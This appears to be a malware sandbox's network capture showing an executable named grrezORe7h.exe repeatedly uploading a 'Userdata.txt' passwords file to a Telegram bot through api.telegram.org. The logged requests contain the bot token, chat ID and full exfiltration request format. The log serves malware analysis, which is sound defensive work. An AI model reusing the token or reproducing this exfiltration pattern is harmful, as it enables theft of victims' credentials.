                                                                                                                    2025-01-11 06:24:35 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd332920706cf4
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:35 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 32 39 32 30 37 30 36 63 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd332920706cf4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:35 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:35 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:35 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43779,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576675,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.450029149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:36 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd333d1c059f2a
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:36 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 33 64 31 63 30 35 39 66 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd333d1c059f2aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:37 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:37 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:37 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43780,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576677,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.450041149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:38 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd334e617abdef
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:38 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 34 65 36 31 37 61 62 64 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd334e617abdefContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:38 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:38 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 543
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:38 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43781,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576678,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.450046149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:40 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd3360eddb09a8
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:40 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 36 30 65 64 64 62 30 39 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd3360eddb09a8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:40 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:40 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:40 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43782,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576680,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.450048149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:41 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd33721b5eeed7
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:41 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 37 32 31 62 35 65 65 65 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd33721b5eeed7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:41 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:41 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:41 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43783,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576681,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.450050149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:43 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd3385df447484
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:43 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 38 35 64 66 34 34 37 34 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd3385df447484Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:43 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:43 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 543
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:43 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43784,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576683,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    26192.168.2.450052149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:44 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd33984405d90a
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:44 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 39 38 34 34 30 35 64 39 30 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd33984405d90aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:45 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:44 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:45 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43785,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576684,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    27192.168.2.450054149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:46 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
